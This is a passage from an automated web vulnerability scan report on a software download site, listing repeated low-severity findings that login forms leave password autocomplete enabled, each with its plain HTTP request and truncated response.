Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:32:06 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:42:24 GMT
Cache-Control: max-age=600
Pragma: cache
Set-Cookie: last_search=a%3A3%3A%7Bs%3A11%3A%22category_id%22%3Bs%3A3%3A%22304%22%3Bs%3A1%3A%22o%22%3Bi%3A0%3Bs%3A1%3A%22s%22%3Bs%3A1%3A%22d%22%3B%7D; path=/
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 73700


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.306. http://www.x64bitdownload.com/contact.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /contact.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /contact.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:21:26 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 23053

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.307. http://www.x64bitdownload.com/download/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /download/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /download/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:41:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Mon, 24 Jan 2011 15:51:47 GMT
Cache-Control: max-age=600
Pragma: cache
Connection: close
Content-Type: text/html; charset=UTF-8
X-Pad: avoid browser bug
Content-Length: 24883

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content-
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.308. http://www.x64bitdownload.com/downloads/t-64-bit-communitymate-download-qeakzpwv.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-communitymate-download-qeakzpwv.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-communitymate-download-qeakzpwv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:53 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55652


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.309. http://www.x64bitdownload.com/downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-cyberlink-youcam-download-gspvirzx.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56719


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.310. http://www.x64bitdownload.com/downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-e107-chat-plugin-for-123-flash-chat-download-kkkispxz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:28 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.311. http://www.x64bitdownload.com/downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-easytether-x64-download-byhsbuvf.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:18:59 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 53837


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.312. http://www.x64bitdownload.com/downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-messenger-plus-live-download-upxgwatv.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:27 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60009


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.313. http://www.x64bitdownload.com/downloads/t-64-bit-news-file-grabber-download-stclytop.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-news-file-grabber-download-stclytop.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-news-file-grabber-download-stclytop.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:37 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55606


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.314. http://www.x64bitdownload.com/downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-newsgroup-commander-pro-download-rjfsmxpp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55307


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.315. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-nokia-ovi-suite-download-bhfheplp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:55 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 55142


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.316. http://www.x64bitdownload.com/downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-nokia-pc-suite-download-psjkkdil.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:20 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57457


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.317. http://www.x64bitdownload.com/downloads/t-64-bit-oovoo-download-jrletedp.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-oovoo-download-jrletedp.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-oovoo-download-jrletedp.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:49 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60411


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.318. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html HTTP/1.1
Host: www.x64bitdownload.com
Proxy-Connection: keep-alive
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 14:54:37 GMT
Server: Apache/2.2.9 (Fedora)
Set-Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73; expires=Sat, 23 Jul 2011 14:54:37 GMT; path=/
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57051


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.319. http://www.x64bitdownload.com/downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-ozum-download-lhtivuds.html/x22

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-ozum-download-lhtivuds.html/x22 HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:29 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57059


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.320. http://www.x64bitdownload.com/downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-paragon-extbrowser-download-xwigzbic.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:31 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54548


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.321. http://www.x64bitdownload.com/downloads/t-64-bit-pidgin-download-kkwthbed.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-pidgin-download-kkwthbed.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-pidgin-download-kkwthbed.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:47 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57745


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.322. http://www.x64bitdownload.com/downloads/t-64-bit-rss-reader-download-avwkinlm.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-rss-reader-download-avwkinlm.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-rss-reader-download-avwkinlm.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:15:33 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54559


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.323. http://www.x64bitdownload.com/downloads/t-64-bit-skype-download-szhzvwoz.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-skype-download-szhzvwoz.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-skype-download-szhzvwoz.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:01 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 57805


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.324. http://www.x64bitdownload.com/downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-sony-ericsson-pc-suite-download-xqhxzeta.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:16:42 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 56528


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.325. http://www.x64bitdownload.com/downloads/t-64-bit-teamspeak-download-opmulwsy.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
Path:   /downloads/t-64-bit-teamspeak-download-opmulwsy.html

Issue detail

The page contains a form with the following action URL:
  • http://www.x64bitdownload.com/login.html
The form contains the following password field with autocomplete enabled:
  • password

Request

GET /downloads/t-64-bit-teamspeak-download-opmulwsy.html HTTP/1.1
Host: www.x64bitdownload.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: downloadsite=2k9hcu88qhiq0oc88olgcs7f73;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 15:17:43 GMT
Server: Apache/2.2.9 (Fedora)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59803


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
   <meta http-equiv="content
...[SNIP]...
</div>

                                   <form action="/login.html" method="post">
           <table>
...[SNIP]...
<td><input name="password" type="password" /></td>
...[SNIP]...

15.326. http://www.x64bitdownload.com/downloads/t-64-bit-trollkiller-for-firefox-download-ydeukbjf.html

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.x64bitdownload.com
